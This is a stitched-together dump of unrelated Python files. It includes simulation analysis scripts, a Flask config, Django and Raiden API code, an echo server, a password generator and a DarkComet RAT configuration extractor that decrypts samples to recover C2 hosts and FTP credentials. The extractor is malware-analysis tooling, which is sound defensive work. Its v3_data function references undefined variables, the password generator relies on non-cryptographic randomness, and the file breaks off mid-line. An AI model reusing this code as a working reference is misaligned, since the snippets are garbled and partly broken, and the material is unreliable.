TShell5pHierarchicLinearThickBeamTest, TShell5pHierarchicLinearScordelisTest, TShell5pHierarchicNonLinearThickBeamTest ])) allSuite = suites['all'] allSuite.addTests(nightSuite) return suites if __name__ == '__main__': KratosUnittest.runTests(AssembleTestSuites()) AdaptivePELE/analysis/calculateDistances.py from __future__ import absolute_import, division, print_function, unicode_literals import os import glob import time import argparse import numpy as np import mdtraj as md import multiprocessing as mp from AdaptivePELE.utilities import utilities from AdaptivePELE.analysis import analysis_utils def parseArguments(): """ Parse the command-line options :returns: object -- Object containing the options passed """ desc = "Program that caculates the relative SASA of a ligand." parser = argparse.ArgumentParser(description=desc) parser.add_argument("residues", type=str, nargs='+', help="Atom pairs to calculate the distances in the format res_name1:res_number1:atomname1-res_name2:res_number2:atomname2") parser.add_argument("--path", type=str, default=".", help="Path where the simulation is stored") parser.add_argument("--top", type=str, default=None, help="Topology file for non-pdb trajectories or path to Adaptive topology object") parser.add_argument("--out_name", type=str, default="fixedReport", help="Name of the modified report files (default is fixedReport)") parser.add_argument("--out_folder", type=str, default=None, help="Path where to store the report files (default is fixedReport)") parser.add_argument("-n", type=int, default=1, help="Number of processors to parallelize") parser.add_argument("--fmt_str", type=str, default="%.4f", help="Format of the output file (default is .4f which means all floats with 4 decimal points)") parser.add_argument("--new_report", action="store_true", help="Whether to create new report files instead of modifying existing ones") parser.add_argument("--traj_to_process", nargs="*", type=int, default=None, help="Number of the trajectories to filter, if not specified all of them will be processed") args = parser.parse_args() return args.residues, args.path, args.top, args.out_name, args.fmt_str, args.n, args.out_folder, args.new_report, args.traj_to_process def parse_selection(res_input): parsed_selection = [] for residues in res_input: res_info = residues.split("-") parsed_selection.append(tuple([tuple(res.split(":")) for res in res_info])) return parsed_selection def calculate_distances(trajectory, topology, residues): """ Calculate the distances between pairs of atoms in a trajectory :param trajectory: Name of the trajectory file :type trajectory: str :param topology: Topology of the trajectory (needed for non-pdb trajs) :type topology: str :param residues: Pairs of atoms to calculate distances :type residues: list """ utilities.print_unbuffered("Processing", trajectory) t = md.load(trajectory, top=topology) atom_pairs = [] for info1, info2 in residues: atom1 = t.top.select("resname '%s' and residue %s and name %s" % info1) atom2 = t.top.select("resname '%s' and residue %s and name %s" % info2) if atom1.size == 0 or atom2.size == 0: raise ValueError("Nothing found under current selection") atom_pairs.append(atom1.tolist()+atom2.tolist()) atom_pairs = np.array(atom_pairs) return 10*md.compute_distances(t, atom_pairs) def process_file(traj, top_file, residues, report, outputFilename, format_out, new_report, epoch, distances_header): start = time.time() distances = calculate_distances(traj, top_file, residues) header = "" if not new_report: try: reportFilename = glob.glob(report)[0] except IndexError: raise IndexError("File %s not found" % report) if outputFilename != reportFilename: reportFilename = outputFilename with open(reportFilename) as f: header = f.readline().rstrip() if not header.startswith("#"): header = "" reportFile = utilities.loadtxtfile(f) fixedReport = analysis_utils.extendReportWithRmsd(reportFile, distances) else: indexes = np.array(range(distances.shape[0])) fixedReport = np.concatenate((indexes[:, None], distances), axis=1) with open(outputFilename, "w") as fw: if header: fw.write("%s\t%s\n" % (header, distances_header)) else: fw.write("# Step\t%s\n" % distances_header) np.savetxt(fw, fixedReport, fmt=format_out, delimiter="\t") end = time.time() print("Took %.2fs to process" % (end-start), traj) def main(residues, folder, top, out_report_name, format_out, nProcessors, output_folder, new_report, trajs_to_select): """ Calculate the distances between paris of atoms :param residues: Pairs of atoms to calculate distances :type residues: list :param folder: Path the simulation :type folder: str :param top: Path to the topology :type top: str :param out_report_name: Name of the output file :type out_report_name: str :param format_out: String with the format of the output :type format_out: str :param nProcessors: Number of processors to use :type nProcessors: int :param output_folder: Path where to store the new reports :type output_folder: str :param new_report: Whether to create new reports :type new_report: bool :param trajs_to_select: Number of the reports to read, if don't want to select all :type trajs_to_select: set """ # Constants if output_folder is not None: out_report_name = os.path.join(output_folder, out_report_name) outputFilename = "_".join([out_report_name, "%d"]) trajName = "*traj*" reportName = "*report*_%d" distances_label = "\t".join(residues) residues = parse_selection(residues) if nProcessors is None: nProcessors = utilities.getCpuCount() nProcessors = max(1, nProcessors) print("Calculating distances with %d processors" % nProcessors) epochs = utilities.get_epoch_folders(folder) if top is not None: top_obj = utilities.getTopologyObject(top) else: top_obj = None files = [] if not epochs: # path does not contain an adaptive simulation, we'll try to retrieve # trajectories from the specified path files = analysis_utils.process_folder(None, folder, trajName, reportName, os.path.join(folder, outputFilename), top_obj, trajs_to_select) for epoch in epochs: print("Epoch", epoch) files.extend(analysis_utils.process_folder(epoch, folder, trajName, reportName, os.path.join(folder, epoch, outputFilename), top_obj, trajs_to_select)) print("Starting to process files!") pool = mp.Pool(nProcessors) results = [pool.apply_async(process_file, args=(info[0], info[2], residues, info[1], info[4], format_out, new_report, info[3], distances_label)) for info in files] pool.close() pool.join() for res in results: res.get() if __name__ == "__main__": pairs, path, topology_path, out_name, fmt_str, n_proc, out_folder, new_reports, traj_filter = parseArguments() if traj_filter is not None: traj_filter = set(traj_filter) main(pairs, path, topology_path, out_name, fmt_str, n_proc, out_folder, new_reports, traj_filter) #pylint: disable-msg=R0903 import os basedir = os.path.abspath(os.path.dirname(__file__)) class Config(object): CSRF_ENABLED = True SECRET_KEY = os.environ.get('SECRET_KEY') or 'my secret key' UPLOADS_DEFAULT_DEST = os.environ.get('UPLOADS_DEFAULT_DEST') or basedir + '/app/static/uploads' MAIL_SERVER = os.environ.get('MAIL_SERVER') or 'smtp.gmail.com' MAIL_PORT = os.environ.get('MAIL_POST') or 465 MAIL_USE_SSL = os.environ.get('MAIL_USE_SSL') or True MAIL_USERNAME = os.environ.get('MAIL_USERNAME') or '' MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD') or '' FB_APP_ID = os.environ.get('FB_APP_ID') or 'my_app_id' FB_APP_SECRET = os.environ.get('FB_APP_SECRET') or 'my_app_secret' FB_PAGE_ID = os.environ.get('FB_PAGE_ID') or 'my_page_id' GOOGLE_ANALYTICS_ID = os.environ.get('GOOGLE_ANALYTICS_ID') or 'XXXX' BABEL_DEFAULT_LOCALE = 'is' AFLAFRETTIR_USER = os.environ.get('AFLAFRETTIR_USER') or 'USERNAME' AFLAFRETTIR_PASS = os.environ.get('AFLAFRETTIR_PASS') or 'PASSWORD' class DevelopmentConfig(Config): DEBUG = True SQLALCHEMY_DATABASE_URI = os.environ.get('DEV_DATABASE_URL') or \ 'sqlite:///' + os.path.join(basedir, 'data-dev.sqlite') WHOOSH_BASE = os.environ.get('WHOOSH_BASE_DEV') or \ os.path.join(basedir, 'whoosh-dev.db') IMAGE_DELETE = { 'TIME_OF_DAY': [i for i in range(24)], 'WEEKDAY': [i for i in range(7)] } POSTS_PER_PAGE = 40 class TestingConfig(Config): TESTING = True SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE_URL') or \ 'sqlite:///' + os.path.join(basedir, 'test-dev.sqlite') WHOOSH_BASE = os.environ.get('WHOOSH_BASE_TEST') or \ os.path.join(basedir, 'whoosh-test.db') POSTS_PER_PAGE = 4 class ProductionConfig(Config): SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \ 'sqlite:///' + os.path.join(basedir, 'data.sqlite') WHOOSH_BASE = os.environ.get('WHOOSH_BASE') or \ os.path.join(basedir, 'whoosh.db') IMAGE_DELETE = { 'TIME_OF_DAY': [3, 4], 'WEEKDAY': [0] } POSTS_PER_PAGE = 40 config = {'development': DevelopmentConfig, 'testing': TestingConfig, 'production': ProductionConfig, 'default': DevelopmentConfig} import string from binascii import * import pefile from common import Modules, load_yara_rules, PEParseModule, ModuleMetadata from types import StringType class darkcomet(PEParseModule): def __init__(self): md = ModuleMetadata( module_name="darkcomet", bot_name="DarkComet", description="RAT", authors=[" (@botnet_hunter)", " <>"], version="1.0.1", date="Oct 04, 2015", references=[] ) PEParseModule.__init__(self, md) self.yara_rules = None pass def _generate_yara_rules(self): if self.yara_rules is None: self.yara_rules = load_yara_rules("darkcomet.yara") return self.yara_rules @staticmethod def rc4crypt(data, key): x = 0 box = range(256) for i in range(256): x = (x + box[i] + ord(key[i % len(key)])) % 256 box[i], box[x] = box[x], box[i] x = 0 y = 0 out = [] for char in data: x = (x + 1) % 256 y = (y + box[x]) % 256 box[x], box[y] = box[y], box[x] out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256])) return ''.join(out) @staticmethod def v51_data(data, enckey): config = {"FWB": "", "GENCODE": "", "MUTEX": "", "NETDATA": "", "OFFLINEK": "", "SID": "", "FTPUPLOADK": "", "FTPHOST": "", "FTPUSER": "", "FTPPASS": "", "FTPPORT": "", "FTPSIZE": "", "FTPROOT": "", "PWD": ""} dec = darkcomet.rc4crypt(unhexlify(data), enckey) dec_list = dec.split('\n') for entries in dec_list[1:-1]: key, value = entries.split('=') key = key.strip() value = value.rstrip()[1:-1] clean_value = filter(lambda x: x in string.printable, value) config[key] = clean_value config["Version"] = enckey[:-4] return config @staticmethod def v3_data(data, key): config = {"FWB": "", "GENCODE": "", "MUTEX": "", "NETDATA": "", "OFFLINEK": "", "SID": "", "FTPUPLOADK": "", "FTPHOST": "", "FTPUSER": "", "FTPPASS": "", "FTPPORT": "", "FTPSIZE": "", "FTPROOT": "", "PWD": ""} dec = darkcomet.rc4crypt(unhexlify(data), key) config[str(entry.name)] = dec config["Version"] = enckey[:-4] return config @staticmethod def versionCheck(rawData): if "#KCMDDC2#" in rawData: return "#KCMDDC2#-890" elif "#KCMDDC4#" in rawData: return "#KCMDDC4#-890" elif "#KCMDDC42#" in rawData: return "#KCMDDC42#-890" elif "#KCMDDC42F#" in rawData: return "#KCMDDC42F#-890" elif "#KCMDDC5#" in rawData: return "#KCMDDC5#-890" elif "#KCMDDC51#" in rawData: return "#KCMDDC51#-890" else: return None @staticmethod def configExtract(rawData, key): config = {"FWB": "", "GENCODE": "", "MUTEX": "", "NETDATA": "", "OFFLINEK": "", "SID": "", "FTPUPLOADK": "", "FTPHOST": "", "FTPUSER": "", "FTPPASS": "", "FTPPORT": "", "FTPSIZE": "", "FTPROOT": "", "PWD": ""} pe = pefile.PE(data=rawData) rt_string_idx = [entry.id for entry in pe.DIRECTORY_ENTRY_RESOURCE.entries].index(pefile.RESOURCE_TYPE['RT_RCDATA']) rt_string_directory = pe.DIRECTORY_ENTRY_RESOURCE.entries[rt_string_idx] for entry in rt_string_directory.directory.entries: if str(entry.name) == "DCDATA": data_rva = entry.directory.entries[0].data.struct.OffsetToData size = entry.directory.entries[0].data.struct.Size data = pe.get_memory_mapped_image()[data_rva:data_rva+size] config = darkcomet.v51_data(data, key) elif str(entry.name) in config.keys(): data_rva = entry.directory.entries[0].data.struct.OffsetToData size = entry.directory.entries[0].data.struct.Size data = pe.get_memory_mapped_image()[data_rva:data_rva+size] dec = darkcomet.rc4crypt(unhexlify(data), key) config[str(entry.name)] = filter(lambda x: x in string.printable, dec) config["Version"] = key[:-4] return config @staticmethod def run(data): versionKey = darkcomet.versionCheck(data) if versionKey != None: config = darkcomet.configExtract(data, versionKey) return config else: return None def get_bot_information(self, file_data): results = darkcomet.run(file_data) # Sanitize for key in results.keys(): if type(results[key]) is StringType: results[key] = results[key].encode("string-escape") if "NETDATA" in results and len(results["NETDATA"]) > 0: c2s = results["NETDATA"].split("|") results['c2s'] = [] for c2 in c2s: results['c2s'].append({"c2_uri": "tcp://" + c2 + "/"}) return results Modules.list.append(darkcomet())factory-ai-vision/EdgeSolution/modules/WebModule/backend/vision_on_edge/azure_parts/api/serializers.py """App API serializers. """ import logging from django.db.utils import IntegrityError from rest_framework import serializers from rest_framework.exceptions import ValidationError from ..exceptions import PartSameNameExistError from ..models import Part logger = logging.getLogger(__name__) class PartSerializer(serializers.ModelSerializer): """PartSerializer.""" local_image_count = serializers.IntegerField(read_only=True, source="get_tagged_images_count_local") remote_image_count = serializers.IntegerField(read_only=True, source="get_tagged_images_count_remote") class Meta: model = Part fields = "__all__" extra_kwargs = {"description": {"required": False}} def create(self, validated_data): """create. Args: validated_data: """ try: return Part.objects.create(**validated_data) except (IntegrityError, ValidationError): raise PartSameNameExistError def update(self, instance, validated_data): """update. Args: instance: validated_data: """ try: result = super().update(instance, validated_data) return result except (IntegrityError, ValidationError): raise PartSameNameExistError #!/usr/bin/env python # -*- coding: utf-8 -*- # ------------------------------------------------------------------- # Copyright (c) 2010-2020 # This file is part of the extensive automation project # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301 USA # ------------------------------------------------------------------- import logging import logging.handlers LG = None # Singleton def instance(): """Returns Singleton""" return LG def info(txt): """Log info message""" global LG LG.info(txt) def error(txt): """Log error message""" global LG LG.error(txt) def debug(txt): """Log trace message""" global LG LG.debug(txt) def initialize(log_file, level, max_size, nb_files): """initialize""" global LG LG = logging.getLogger('Logger') set_level(level=level) max_bytes = int(max_size.split('M')[0]) * 1024 * 1024 handler = logging.handlers.RotatingFileHandler(log_file, maxBytes=int(max_bytes), backupCount=int(nb_files) ) formatter = logging.Formatter("%(asctime)s - %(levelname)s - %(message)s") handler.setFormatter(formatter) LG.addHandler(handler) def set_level(level): """set the level log""" global LG # write everything messages if level == 'DEBUG': LG.setLevel(logging.DEBUG) # write anything that is an error or worse. if level == 'ERROR': LG.setLevel(logging.ERROR) # write anything that is an info message or worse. if level == 'INFO': LG.setLevel(logging.INFO) def finalize(): """Destroy Singleton""" global LG if LG: logging.shutdown() LG = None# Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging import os from os import listdir from os.path import join from ..core.utils import is_temporary_output_file from .OutputValidator import OutputValidator class FileOutputValidator(OutputValidator): def set_output_dir(self, output_dir): self.output_dir = output_dir @staticmethod def num_files_matching_content_in_dir(dir_path, expected_content): listing = listdir(dir_path) if not listing: return 0 files_of_matching_content_found = 0 for file_name in listing: full_path = join(dir_path, file_name) if not os.path.isfile(full_path) or is_temporary_output_file(full_path): continue with open(full_path, 'r') as out_file: contents = out_file.read() logging.info("dir %s -- name %s", dir_path, file_name) logging.info("expected content: %s -- actual: %s, match: %r", expected_content, contents, expected_content in contents) if expected_content in contents: files_of_matching_content_found += 1 return files_of_matching_content_found @staticmethod def get_num_files(dir_path): listing = listdir(dir_path) logging.info("Num files in %s: %d", dir_path, len(listing)) if not listing: return 0 files_found = 0 for file_name in listing: full_path = join(dir_path, file_name) if os.path.isfile(full_path) and not is_temporary_output_file(full_path): logging.info("Found output file in %s: %s", dir_path, file_name) files_found += 1 return files_found def validate(self, dir=''): pass from ipuz.exceptions import IPUZException from .stylespec import validate_stylespec def validate_styledcell(field_data): if (field_data is not None and type(field_data) not in [int, dict] and not isinstance(field_data, str)): return False if isinstance(field_data, dict): if not field_data: return False if not all(key in ("cell", "style") for key in field_data): return False if ("cell" in field_data and field_data["cell"] is not None and type(field_data["cell"]) is not int and not isinstance(field_data["cell"], str)): return False if "style" in field_data: try: validate_stylespec(field_data["style"]) except IPUZException: return False return True 861934367/genecast import matplotlib as mpl mpl.use('Agg') import pysam import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns import argparse as apa import multiprocessing def isPaired(bamfile, alignments=1000): '''check if a *bamfile* contains paired end data The method reads at most the first *alignments* and returns True if any of the alignments are paired. ''' samfile = pysam.Samfile(bamfile) n = 0 for read in samfile: if read.is_paired: break n += 1 if n == alignments: break samfile.close() return n != alignments def estimateInsertSizeDistribution(bamfile, alignments=1000): ''' estimate insert size from first alignments in bam file. returns mean and stddev of insert sizes. ''' assert isPaired(bamfile), \ 'can only estimate insert size from' \ 'paired bam files' samfile = pysam.Samfile(bamfile) # only get positive to avoid double counting inserts = np.array([read.tlen for read in samfile if read.is_proper_pair and read.tlen > 0]) return inserts def plot(list, name): sns.distplot(list) plt.savefig(name + "_insert_size.png") plt.close() def plot_insert_size(bam_file): inserts = estimateInsertSizeDistribution(bam_file) plot(inserts, bam_file.rstrip(".bam")) if __name__ == "__main__": parser = apa.ArgumentParser(prog="convert") parser.add_argument("bams", nargs='*', help="*.bam") parser.add_argument('-p', '--progress', required=False, default=1, type=int, help='parallel') args = parser.parse_args() pool = multiprocessing.Pool(processes=args.progress) for file in args.bams: pool.apply_async(plot_insert_size, (file,)) pool.close() pool.join()krconv/greenmountainpower import dataclasses import datetime import enum import oauthlib import requests_oauthlib from . import exceptions _CLIENT_ID = "C95D19408B024BD4BEB42FA66F08BCEA" _BASE_URL = "https://api.greenmountainpower.com" @dataclasses.dataclass class Usage: start_time: datetime.datetime consumed_kwh: float @classmethod def try_parse_data(cls, data: dict): try: yield cls( start_time=datetime.datetime.strptime( data["date"], "%Y-%m-%dT%H:%M:%SZ" ), consumed_kwh=data["consumed"], ) except KeyError: pass class UsagePrecision(enum.Enum): MONTHLY = "monthly" DAILY = "daily" HOURLY = "hourly" class GreenMountainPowerApi: """Client for accessing Green Mountain Power API""" def __init__(self, account_number: int, username: str, password: str): self.account_number = account_number def token_updater(token): self.session.token = token self.session = requests_oauthlib.OAuth2Session( client=oauthlib.oauth2.LegacyApplicationClient(client_id=_CLIENT_ID), auto_refresh_url=f"{_BASE_URL}/api/v2/applications/token", token_updater=token_updater, ) token = self.session.fetch_token( token_url=f"{_BASE_URL}/api/v2/applications/token", username=username, password=password, include_client_id=True, force_querystring=True, ) def get_usage( self, precision: UsagePrecision, start_time: datetime.datetime, end_time: datetime.datetime, ): response = self.session.get( url=f"{_BASE_URL}/api/v2/usage/{self.account_number}/{precision.value}", params={ "startDate": start_time.astimezone().isoformat(), "endDate": end_time.astimezone().isoformat(), }, ) if response.status_code == 400: raise exceptions.BadRequestException(response.json()["message"]) if response.status_code == 401: raise exceptions.UnauthorizedException(response.json()["message"]) data = response.json() return [ usage for interval in data["intervals"] for value in interval["values"] for usage in Usage.try_parse_data(value) ] raiden/api/v1/resources.py from flask import Blueprint from flask_restful import Resource from webargs.flaskparser import use_kwargs from raiden.api.v1.encoding import ( BlockchainEventsRequestSchema, ChannelPatchSchema, ChannelPutSchema, ChannelLuminoGetSchema, ChannelPutLuminoSchema, ConnectionsConnectSchema, ConnectionsLeaveSchema, PaymentSchema, RaidenEventsRequestSchema, DashboardLuminoSchema, RaidenEventsRequestSchemaV2, SearchLuminoRequestSchema, TokenActionSchema, TokenActionRequestSchema ) from raiden.utils import typing def create_blueprint(): # Take a look at this SO question on hints how to organize versioned # API with flask: # http://stackoverflow.com/questions/28795561/support-multiple-api-versions-in-flask#28797512 return Blueprint("v1_resources", __name__) class BaseResource(Resource): def __init__(self, rest_api_object, **kwargs): super().__init__(**kwargs) self.rest_api = rest_api_object class AddressResource(BaseResource): def get(self): return self.rest_api.get_our_address() class ChannelsResource(BaseResource): put_schema = ChannelPutSchema def get(self): """ this translates to 'get all channels the node is connected with' """ return self.rest_api.get_channel_list( self.rest_api.raiden_api.raiden.default_registry.address ) @use_kwargs(put_schema, locations=("json",)) def put(self, **kwargs): return self.rest_api.open( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, **kwargs ) class ChannelsResourceLumino(BaseResource): get_schema = ChannelLuminoGetSchema put_schema = ChannelPutLuminoSchema @use_kwargs(get_schema, locations=('query',)) def get(self, token_addresses: typing.ByteString = None): """ this translates to 'get the channels for the tokens and check if they can join' """ return self.rest_api.get_channel_list_for_tokens( self.rest_api.raiden_api.raiden.default_registry.address, token_addresses=token_addresses ) @use_kwargs(put_schema, locations=("json",)) def put(self, **kwargs): return self.rest_api.open_lumino( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, **kwargs ) class ChannelsResourceByTokenAddress(BaseResource): def get(self, **kwargs): """ this translates to 'get all channels the node is connected to for the given token address' """ return self.rest_api.get_channel_list( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, **kwargs ) class ChannelsResourceByTokenAndPartnerAddress(BaseResource): patch_schema = ChannelPatchSchema @use_kwargs(patch_schema, locations=("json",)) def patch(self, **kwargs): return self.rest_api.patch_channel( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, **kwargs ) def get(self, **kwargs): return self.rest_api.get_channel( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, **kwargs ) class TokensResource(BaseResource): def get(self): """ this translates to 'get all token addresses we have channels open for' """ return self.rest_api.get_tokens_list( self.rest_api.raiden_api.raiden.default_registry.address ) class PartnersResourceByTokenAddress(BaseResource): def get(self, token_address): return self.rest_api.get_partners_by_token( self.rest_api.raiden_api.raiden.default_registry.address, token_address ) class BlockchainEventsNetworkResource(BaseResource): get_schema = BlockchainEventsRequestSchema() @use_kwargs(get_schema, locations=("query",)) def get(self, from_block, to_block): from_block = from_block or self.rest_api.raiden_api.raiden.query_start_block to_block = to_block or "latest" return self.rest_api.get_blockchain_events_network( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, from_block=from_block, to_block=to_block, ) class BlockchainEventsTokenResource(BaseResource): get_schema = BlockchainEventsRequestSchema() @use_kwargs(get_schema, locations=("query",)) def get(self, token_address, from_block, to_block): from_block = from_block or self.rest_api.raiden_api.raiden.query_start_block to_block = to_block or "latest" return self.rest_api.get_blockchain_events_token_network( token_address=token_address, from_block=from_block, to_block=to_block ) class ChannelBlockchainEventsResource(BaseResource): get_schema = BlockchainEventsRequestSchema() @use_kwargs(get_schema, locations=("query",)) def get(self, token_address, partner_address=None, from_block=None, to_block=None): from_block = from_block or self.rest_api.raiden_api.raiden.query_start_block to_block = to_block or "latest" return self.rest_api.get_blockchain_events_channel( token_address=token_address, partner_address=partner_address, from_block=from_block, to_block=to_block, ) class RaidenInternalEventsResource(BaseResource): get_schema = RaidenEventsRequestSchema() @use_kwargs(get_schema, locations=("query",)) def get(self, limit=None, offset=None): return self.rest_api.get_raiden_internal_events_with_timestamps(limit=limit, offset=offset) class RegisterTokenResource(BaseResource): def get(self, token_address): return self.rest_api.get_token_network_for_token( self.rest_api.raiden_api.raiden.default_registry.address, token_address ) def put(self, token_address): return self.rest_api.register_token( self.rest_api.raiden_api.raiden.default_registry.address, token_address ) class ConnectionsResource(BaseResource): put_schema = ConnectionsConnectSchema() delete_schema = ConnectionsLeaveSchema() @use_kwargs(put_schema) def put(self, token_address, funds, initial_channel_target, joinable_funds_target): return self.rest_api.connect( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, token_address=token_address, funds=funds, initial_channel_target=initial_channel_target, joinable_funds_target=joinable_funds_target, ) @use_kwargs(delete_schema, locations=("json",)) def delete(self, token_address): return self.rest_api.leave( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, token_address=token_address, ) class ConnectionsInfoResource(BaseResource): def get(self): return self.rest_api.get_connection_managers_info( self.rest_api.raiden_api.raiden.default_registry.address ) class PaymentResource(BaseResource): post_schema = PaymentSchema(only=("amount", "identifier", "secret", "secret_hash")) get_schema = RaidenEventsRequestSchema() @use_kwargs(get_schema, locations=("query",)) def get( self, token_address: typing.TokenAddress = None, target_address: typing.Address = None, limit: int = None, offset: int = None, ): return self.rest_api.get_raiden_events_payment_history_with_timestamps( token_address=token_address, target_address=target_address, limit=limit, offset=offset ) @use_kwargs(post_schema, locations=("json",)) def post( self, token_address: typing.TokenAddress, target_address: typing.TargetAddress, amount: typing.PaymentAmount, identifier: typing.PaymentID, secret: typing.Secret, secret_hash: typing.SecretHash, ): return self.rest_api.initiate_payment( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, token_address=token_address, target_address=target_address, amount=amount, identifier=identifier, secret=secret, secret_hash=secret_hash, ) class PendingTransfersResource(BaseResource): def get(self): return self.rest_api.get_pending_transfers() class PendingTransfersResourceByTokenAddress(BaseResource): def get(self, token_address): return self.rest_api.get_pending_transfers(token_address) class PendingTransfersResourceByTokenAndPartnerAddress(BaseResource): def get(self, token_address, partner_address): return self.rest_api.get_pending_transfers(token_address, partner_address) class DashboardResource(BaseResource): get_schema = DashboardLuminoSchema() @use_kwargs(get_schema, locations=('query',)) def get( self, graph_from_date: typing.LogTime = None, graph_to_date: typing.LogTime = None, table_limit: int = None ): return self.rest_api.get_dashboard_data( self.rest_api.raiden_api.raiden.default_registry.address, graph_from_date=graph_from_date, graph_to_date=graph_to_date, table_limit=table_limit ) class PaymentResourceLumino(BaseResource): get_schema = RaidenEventsRequestSchemaV2() @use_kwargs(get_schema, locations=('query',)) def get( self, token_network_identifier: typing.Address = None, initiator_address: typing.Address = None, target_address: typing.Address = None, from_date: typing.LogTime = None, to_date: typing.LogTime = None, event_type: int = None, limit: int = None, offset: int = None, ): return self.rest_api.get_raiden_events_payment_history_with_timestamps_v2( token_network_identifier=token_network_identifier, initiator_address=initiator_address, target_address=target_address, from_date=from_date, to_date=to_date, event_type=event_type, limit=limit, offset=offset, ) class NetworkResource(BaseResource): def get(self, token_network_address): return self.rest_api.get_network_graph(token_network_address) class SearchLuminoResource(BaseResource): get_schema = SearchLuminoRequestSchema() @use_kwargs(get_schema, locations=('query',)) def get( self, query: typing.ByteString = None, only_receivers: bool = None ): return self.rest_api.search_lumino( self.rest_api.raiden_api.raiden.default_registry.address, query=query, only_receivers=only_receivers ) class TokenActionResource(BaseResource): get_schema = TokenActionRequestSchema() post_schema = TokenActionSchema() @use_kwargs(get_schema, locations=("query",)) def get( self, token: typing.ByteString = None ): return self.rest_api.get_token_action( token=token ) @use_kwargs(post_schema, locations=("json",)) def post( self, action: typing.ByteString, ): return self.rest_api.write_token_action(action) name = 'pyhighlight' import matplotlib.pyplot as pyplot import matplotlib.patches as patches class InvalidImagePathError(Exception): def __init__(self, message): super().__init__(message) class EmptyPointsError(Exception): def __init__(self, message): super().__init__(message) class InvalidTransparencyValueError(Exception): def __init__(self, message): super().__init__(message) class pyhighlight: def __init__(self, image_path): try: image = pyplot.imread(image_path) height, width, nbands = image.shape fig_size = width / float(80), height / float(80) figure = pyplot.figure(figsize=fig_size) self.final_image = figure.add_axes([0, 0, 1, 1]) self.final_image.axis('off') self.final_image.imshow(image, interpolation='nearest') except FileNotFoundError: raise InvalidImagePathError('Could not open ' + image_path) def highlight(self, points, color='blue', transparency=0.3): if not points or points == []: raise EmptyPointsError('A valid array of points must be provided') if transparency > 1 or transparency < 0: raise InvalidTransparencyValueError('Transparency must be a value between 0 and 1') shape = pyplot.Polygon(points, closed=True, alpha=transparency, fill=True, color=color) self.final_image.add_patch(shape) def save(self, path='pyhighlight-output.png', transparent=True): generated_image = pyplot.gcf() pyplot.draw() generated_image.savefig(path, dpi=80, transparent=transparent) from django.db.models import CharField, ForeignKey, CASCADE from apps.basics.op_drf.models import CoreModel class SysFiles(CoreModel): dir_name = CharField(max_length=32, verbose_name='磁盘路径') sys_type_name = CharField(max_length=400, verbose_name='系统文件类型') type_name = CharField(max_length=32, verbose_name='盘符类型') total = CharField(max_length=32, verbose_name='磁盘总大小(KB)') disk_sys = CharField(max_length=32, verbose_name='已使用大小(KB)') monitor = ForeignKey(to='monitor.Monitor', on_delete=CASCADE, verbose_name="关联服务器监控信息", db_constraint=False) class Meta: verbose_name = '系统磁盘' verbose_name_plural = verbose_name def __str__(self): return f"{self.creator and self.creator.name}" nitinkumar30/Programming-Basics import random import time from os import system def main(): while True: system('cls') print("[PASSWORD GENERATOR]") pwdtype = input(''' (1) xxx-xxx-xxx type (2) random type ENTER: ''') if pwdtype == '1': passwd = gen_typeone() print("\n[YOUR PASSWORD]") print(f"> {passwd}") input("\n[PRESS ENTER]") elif pwdtype == '2': passwd = gen_typetwo() print("\n[YOUR PASSWORD]") print(f"> {passwd}") input("\n[PRESS ENTER]") else: continue def gen_typeone(): alphabet = 'abcdefghijklmnopqrstuvwxyz' passwd = "-".join(("".join(random.sample(alphabet,k=3))) for _ in range(3)) return passwd def gen_typetwo(): alphabet = 'abcdefghijklmnopqrstuvwxyz' numbers = '1234567890' symbols = '@$*-_#+' passwd = "" numsym = random.choice([1,2,3]) numnum = random.choice([3,4,5]) numalpha = 13 - numsym - numnum passwd = random.choices(alphabet, k=numalpha) + random.choices(numbers, k=numnum) + random.choices(symbols, k=numsym) for _ in range(3): random.shuffle(passwd) passwd = "".join(passwd) return passwd if __name__ == "__main__": main() from __future__ import print_function import socket from microio import * from utils import * def handler(csock): try: while True: yield csock, POLLREAD data = csock.recv(65536) if not data: raise IOError('Connection closed') while data: yield csock, POLLWRITE sent = csock.send(data) if not sent: raise IOError('Connection closed') data = data[sent:] except IOError: yield csock, None def server(address): sock = listen(address) try: while True: err = yield sock, POLLREAD | POLLERROR if err & POLLERROR: raise IOError() csock, addr = sock.accept() yield spawn(handler(csock)) except IOError: yield sock, None def main(): try: loop(server(('127.0.0.1', 25000))) except KeyboardInterrupt: pass if __name__ == '__main__': main() buildings = 1 math = 1 science = 1 garedening = 1 biology = 1 nature = 1 planning = 1 culture = 1 politics = 1 social = 1 people = 1 speech = 1 language = 1 engineering = 1 computer = 1 graphics = 1 programming = 1 Systems = 1 development = 1 animation = 1 communication = 1 media = 1 design = 1 aesthetics = 1 art = 1 chemistry = 1 physics = 1 anamoty = 1 photography = 1 history = 1 painting = 1 drawing = 1 psychology = 1 array = 